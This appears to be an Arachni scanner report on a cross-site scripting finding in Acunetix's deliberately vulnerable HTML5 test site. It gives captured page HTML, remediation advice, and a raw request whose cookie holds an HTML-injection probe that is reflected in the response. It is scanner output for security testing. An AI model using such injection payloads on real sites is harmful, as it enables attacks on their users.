ng-href="http://twitter.com/EFF" target="_blank" class="ng-binding" href="http://twitter.com/EFF" data-arachni-id="1975173">@EFF</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> We're glad to see New York introducing #NetNeutrality protections based on California's SB 822 <br><br> </div> </div> </div> </div><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption" target="_blank" href="https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/www.eff.org" class="ng-binding" href="#/all/filter/www.eff.org" data-arachni-id="-313525244">www.eff.org</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=6cc95ec82a3e1524115d692b9386d60a" href="/like?id=6cc95ec82a3e1524115d692b9386d60a" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=6cc95ec82a3e1524115d692b9386d60a" href="/comment?id=6cc95ec82a3e1524115d692b9386d60a" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=6cc95ec82a3e1524115d692b9386d60a" href="/report?id=6cc95ec82a3e1524115d692b9386d60a" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption" href="#/redir?url=https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption"><div class="detailsboxTitle ng-binding">There is No Middle Ground on Encryption</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/EFF" target="_blank" class="ng-binding" href="http://twitter.com/EFF" data-arachni-id="1975173">@EFF</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> The “middle ground” between what law enforcement agencies want—bad encryption—and what users want—good encryption—is still just bad encryption <br><br> </div> </div> </div> </div><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://ssd.eff.org/en/module-categories/security-scenarios" target="_blank" href="https://ssd.eff.org/en/module-categories/security-scenarios" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/ssd.eff.org" class="ng-binding" href="#/all/filter/ssd.eff.org" data-arachni-id="-947703951">ssd.eff.org</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" href="/like?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" href="/comment?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" href="/report?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://ssd.eff.org/en/module-categories/security-scenarios" href="#/redir?url=https://ssd.eff.org/en/module-categories/security-scenarios"><div class="detailsboxTitle ng-binding">Security Scenarios</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/EFF" target="_blank" class="ng-binding" href="http://twitter.com/EFF" data-arachni-id="1975173">@EFF</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> Our Surveillance Self-Defense site has lessons for targeted groups like journalists and journalism students to be safer online without sacrificing access to information. <br><br> </div> </div> </div> </div><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://blog.github.com/2018-05-01-github-pages-custom-domains-https/" target="_blank" href="https://blog.github.com/2018-05-01-github-pages-custom-domains-https/" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/blog.github.com" class="ng-binding" href="#/all/filter/blog.github.com" data-arachni-id="1782715074">blog.github.com</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=e2fcb75b30bd0791a1fd5bc13ca66343" href="/like?id=e2fcb75b30bd0791a1fd5bc13ca66343" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=e2fcb75b30bd0791a1fd5bc13ca66343" href="/comment?id=e2fcb75b30bd0791a1fd5bc13ca66343" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=e2fcb75b30bd0791a1fd5bc13ca66343" href="/report?id=e2fcb75b30bd0791a1fd5bc13ca66343" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://blog.github.com/2018-05-01-github-pages-custom-domains-https/" href="#/redir?url=https://blog.github.com/2018-05-01-github-pages-custom-domains-https/"><div class="detailsboxTitle ng-binding">Custom domains on GitHub Pages gain support for HTTPS</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/github" target="_blank" class="ng-binding" href="http://twitter.com/github" data-arachni-id="-279974877">@github</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/github" target="_blank" href="http://twitter.com/github" data-arachni-id="750470370"><b class="ng-binding">@github</b></a><br> Today, custom domains on GitHub Pages are gaining support for HTTPS via @letsencrypt. It's another step towards making the web more secure for everyone. <br><br> </div> </div> </div> </div> <ul class="pager ng-scope"> <li><a ng-href="#/popular/page/-1" ng-show="page>0" href="#/popular/page/-1" style="display: none;">Previous</a></li> <li><a ng-href="#/popular/page/1" ng-show="filter==''" href="#/popular/page/1" data-arachni-id="2424595">Next</a></li> </ul></div></div> </div><!--/row--> </div><!--/span--> </div><!--/row--> <hr> <div class="row-fluid"> <div class="pull-left" style="font-size: xx-small;" id="refId">unknown is coming from <b>unknown</b> and has visited this page <b>1</b> times.</div> </div> <div style="background-color:lightgray;width:100%;text-align:center;font-size:14px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p> </div> <footer> <p class="pull-left">© Acunetix Ltd. 2019</p> </footer> </div><!--/.fluid-container--> <!-- Modal --> <div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <form class="modal-body ng-pristine ng-valid" action="/login" method="POST" id="loginForm"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Login</h3> </div> <div class="modal-body"> <div class="control-group"> <!-- Username --> <label class="control-label" for="username">Username</label> <div class="controls"> <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin"> </div> </div> <div class="control-group"> <!-- Password--> <label class="control-label" for="password">Password</label> <div class="controls"> <input type="password" id="password" name="password" placeholder="" class="input-xlarge"> </div> </div> <div class="control-group"> <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a> </div> </div> <div class="modal-footer"> <button class="btn btn-primary" id="loginFormSubmit">Login</button> <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button> </div> </form> </div> <!-- Le javascript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <script src="http://code.jquery.com/jquery-1.9.1.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <!-- App libs --> <script src="/static/app/app.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/libs/sessvars.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/post.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script><div class="fb-comments" data-num-posts="4" data-width="470" data-href="http://testhtml5.vulnweb.com/"></div> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/controllers/controllers.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/services/itemsService.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://bxss.s3.amazonaws.com/ad.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script><iframe name="ads_ads_frame" src="http://ads.bxss.me/ad_server.php?zone_id=234&ad_client=723898932&u_h=1080&u_w=1920&pn=&ref=&url=http://testhtml5.vulnweb.com/&" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" frameborder="0" height="1" scrolling="no" width="1" style="background-color:#FFFFFF;"></iframe> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </body></html> |
This is the original HTTP response body.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 | <script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <!DOCTYPE html> <html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp"> <head> <meta charset="utf-8"> <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <!-- Le styles --> <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet"> <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'> <link href="/static/css/style.css" rel="stylesheet"> <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico"> <style type="text/css"> body { padding-top: 60px; padding-bottom: 40px; } .sidebar-nav { padding: 9px 0; } @media (max-width: 980px) { /* Enable use of floated navbar text */ .navbar-text.pull-right { float: none; padding-left: 5px; padding-right: 5px; } } </style> </head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="container-fluid"> <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a> <p class="navbar-text pull-left"> Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>. </p> <p class="navbar-text pull-right"> <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a> </p> </div> </div> </div> <div class="container-fluid"> <div class="row-fluid"> <div class="span2"> <div class="well sidebar-nav"> <ul class="nav nav-list"> <li class="nav-header">Views</li> <li id="popularLi" class="active"><a href="#/popular">Popular</a></li> <li><a href="#/latest">Latest</a></li> <li><a href="#/carousel">Carousel</a></li> <li><a href="#/archive">Archive</a></li> <li class="nav-header">Website</li> <li><a href="#/about">About</a></li> <li><a href="#/contact">Contact</a></li> <li class="nav-header">Acunetix</li> <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li> <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li> <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li> <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li> </ul> </div><!--/.well --> </div><!--/span--> <div class="span10"> <div class="row-fluid"> <div ng-view></div> </div><!--/row--> </div><!--/span--> </div><!--/row--> <hr> <div class="row-fluid"> <div class="pull-left" style="font-size: xx-small;" id="refId"></div> </div> <div style="background-color:lightgray;width:100%;text-align:center;font-size:14px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p> </div> <footer> <p class="pull-left">© Acunetix Ltd. 2019</p> </footer> </div><!--/.fluid-container--> <!-- Modal --> <div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <form class="modal-body" action="/login" method="POST" id="loginForm"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Login</h3> </div> <div class="modal-body"> <div class="control-group"> <!-- Username --> <label class="control-label" for="username">Username</label> <div class="controls"> <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin"> </div> </div> <div class="control-group"> <!-- Password--> <label class="control-label" for="password">Password</label> <div class="controls"> <input type="password" id="password" name="password" placeholder="" class="input-xlarge"> </div> </div> <div class="control-group"> <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a> </div> </div> <div class="modal-footer"> <button class="btn btn-primary" id="loginFormSubmit">Login</button> <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button> </div> </form> </div> <!-- Le javascript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <script src="http://code.jquery.com/jquery-1.9.1.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <!-- App libs --> <script src="/static/app/app.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/libs/sessvars.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/post.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/controllers/controllers.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/services/itemsService.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://bxss.s3.amazonaws.com/ad.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </body> </html> |
Client-side scripts are used extensively by modern web applications. They perform from simple functions (such as the formatting of text) up to full manipulation of client-side data and Operating System interaction.
Cross Site Scripting (XSS) allows clients to inject scripts into a request and have the server return the script to the client in the response. This occurs because the application is taking untrusted data (in this example, from the client) and reusing it without performing any validation or sanitisation.
If the injected script is returned immediately this is known as reflected XSS. If the injected script is stored by the server and returned to any client visiting the affected page, then this is known as persistent XSS (also stored XSS).
Arachni has discovered that it is possible to insert script content directly into HTML element content.
To remedy XSS vulnerabilities, it is important to never use untrusted or unfiltered data within the code of a HTML page.
Untrusted data can originate not only form the client but potentially a third party or previously uploaded file etc.
Filtering of untrusted data typically involves converting special characters to their HTML entity encoded counterparts (however, other methods do exist, see references). These special characters include:
&<>"'/An example of HTML entity encoding is converting < to <.
Although it is possible to filter untrusted input, there are five locations within an HTML page where untrusted input (even if it has been filtered) should never be placed:
Each of these locations have their own form of escaping and filtering.
Because many browsers attempt to implement XSS protection, any manual verification of this finding should be conducted using multiple different browsers and browser versions.
cookie
input
username
using
GET
at
http://testhtml5.vulnweb.com/logout
pointing to
http://testhtml5.vulnweb.com/logout
.
0 | username=; expires=Thu, 01-Jan-1970 00:00:00 GMT; Path=/ |
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
cookie |
http://testhtml5.vulnweb.com/logout | http://testhtml5.vulnweb.com/logout |
|
|
Raw HTTP request used to retrieve the page.
GET / HTTP/1.1 Host: testhtml5.vulnweb.com Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.4 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: 0c25785427908905790d3a663dc49fa7 Cookie: username=arachni_name</textarea>--><xss_0c25785427908905790d3a663dc49fa7/><!--<textarea>
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 302 FOUND
Server: nginx/1.4.1
Date: Mon, 26 Jan 1970 07:00:01 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 209
Connection: keep-alive
Location: http://testhtml5.vulnweb.com/
Set-Cookie: username=; expires=Thu, 01-Jan-1970 00:00:00 GMT; Path=/
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Mon, 26 Jan 1970 07:00:02 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Content-Encoding: gzip
<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">
<head>
<meta charset="utf-8">
<title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="">
<!-- Le styles -->
<link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">
<link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
<link href="/static/css/style.css" rel="stylesheet">
<link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">
<style type="text/css">
body {
padding-top: 60px;
padding-bottom: 40px;
}
.sidebar-nav {
padding: 9px 0;
}
@media (max-width: 980px) {
/* Enable use of floated navbar text */
.navbar-text.pull-right {
float: none;
padding-left: 5px;
padding-right: 5px;
}
}
</style>
</head>
<body>
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container-fluid">
<button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a>
<p class="navbar-text pull-left">
Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.
</p>
<p class="navbar-text pull-right">
Welcome <b>arachni_name</textarea>--><xss_0c25785427908905790d3a663dc49fa7/><!--<textarea></b> | <a href='/logout'>Logout</a>
</p>
</div>
</div>
</div>
<div class="container-fluid">
<div class="row-fluid">
<div class="span2">
<div class="well sidebar-nav">
<ul class="nav nav-list">
<li class="nav-header">Views</li>
<li id="popularLi" class="active"><a href="#/popular">Popular</a></li>
<li><a href="#/latest">Latest</a></li>
<li><a href="#/carousel">Carousel</a></li>
<li><a href="#/archive">Archive</a></li>
<li class="nav-header">Website</li>
<li><a href="#/about">About</a></li>
<li><a href="#/contact">Contact</a></li>
<li class="nav-header">Acunetix</li>
<li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>
<li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>
<li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>
<li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>
</ul>
</div><!--/.well -->
</div><!--/span-->
<div class="span10">
<div class="row-fluid">
<div ng-view></div>
</div><!--/row-->
</div><!--/span-->
</div><!--/row-->
<hr>
<div class="row-fluid">
<div class="pull-left" style="font-size: xx-small;" id="refId"></div>
</div>
<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">
<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>
</div>
<footer>
<p class="pull-left">© Acunetix Ltd. 2019</p>
</footer>
</div><!--/.fluid-container-->
<!-- Modal -->
<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
<form class="modal-body" action="/login" method="POST" id="loginForm">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
<h3 id="myModalLabel">Login</h3>
</div>
<div class="modal-body">
<div class="control-group">
<!-- Username -->
<label class="control-label" for="username">Username</label>
<div class="controls">
<input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">
</div>
</div>
<div class="control-group">
<!-- Password-->
<label class="control-label" for="password">Password</label>
<div class="controls">
<input type="password" id="password" name="password" placeholder="" class="input-xlarge">
</div>
</div>
<div class="control-group">
<a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>
</div>
</div>
<div class="modal-footer">
<button class="btn btn-primary" id="loginFormSubmit">Login</button>
<button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>
</div>
</form>
</div>
<!-- Le javascript
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>
<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>
<!-- App libs -->
<script src="/static/app/app.js"></script>
<script src="/static/app/libs/sessvars.js"></script>
<script src="/static/app/post.js"></script>
<script src="/static/app/controllers/controllers.js"></script>
<script src="/static/app/services/itemsService.js"></script>
<script src="http://bxss.s3.amazonaws.com/ad.js"></script>
</body>
</html>
Raw HTTP request used to retrieve the page.
